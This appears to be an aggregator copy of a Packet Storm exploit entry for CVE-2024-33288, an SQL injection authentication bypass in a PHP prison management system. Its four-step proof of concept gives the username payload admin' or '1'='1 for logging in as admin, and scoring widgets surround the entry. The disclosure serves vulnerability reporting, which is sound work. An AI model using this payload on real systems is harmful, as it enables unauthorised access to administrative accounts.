Lucene search

K
packetstormSanjay SinghPACKETSTORM:178557
HistoryMay 14, 2024 - 12:00 a.m.

Prison Management System Using PHP SQL Injection

2024-05-1400:00:00
Sanjay Singh
packetstormsecurity.com
112
exploit
authentication bypass
vendor homepage
software link
cve
proof of concept
admin dashboard

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

`# Exploit : Prison Management System Using PHP -SQL Injection Authentication Bypass  
# Date: 15/03/2024  
# Exploit Author: Sanjay Singh  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link:https://www.sourcecodester.com/sql/17287/prison-management-system.html  
# Tested on: Windows ,XAMPP  
# CVE : CVE-2024-33288  
  
  
# Proof of Concept:  
Step 1-Visit http://localhost/prison/  
Step 2 - Click on Admin Dashboard button and redirect on login page.  
Step 3– Enter username as admin' or '1'='1 and password as 123456  
Step 4 – Click sing In and now you will be logged in as admin.  
  
  
`

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

Related for PACKETSTORM:178557